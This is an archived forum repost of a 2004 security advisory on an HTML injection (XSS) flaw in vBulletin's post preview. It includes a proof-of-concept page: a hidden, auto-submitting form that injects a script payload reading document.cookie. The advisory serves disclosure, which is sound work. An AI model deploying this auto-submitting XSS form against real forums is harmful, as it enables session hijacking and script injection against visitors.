Vbulletin Html Injection Vuln

Full Version: Vbulletin Html Injection Vuln

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Jun 24 2004, 06:17 PM

QUOTE

Advisory Name : vBulletin HTML Injection Vulnerability
Release Date : June 24,2004
Application : vBulletin
Test On : 3.0.1 or others?
Vendor : Jelsoft(http://www.vbulletin.com/)
Discover : Cheng Peng Su(apple_soup_at_msn.com)

Intro:
From vendor's website ,it says that ,vBulletin is a powerful, scalable and
fully customizable forums package for your web site. It has been written using
the Web's quickest-growing scripting language; PHP, and is complimented with a
highly efficient and ultra fast back-end database engine built using MySQL.

Proof of concept:
While a user is previewing the post , both newreply.php and newthread.php
do sanitize the input in 'Preview',but not Edit-panel,malicious code can be
injected thru this flaw.

Exploit:
A page as below can lead visitor to a Preview page which contains XSS code.

-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)">"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>
-----------------------------End-----------------------------

Solution:
vBulletin Team will release a patch or a fixed version as soon as possible.

Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China

Source: http://seclists.org/lists/bugtraq/2004/Jun/0395.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.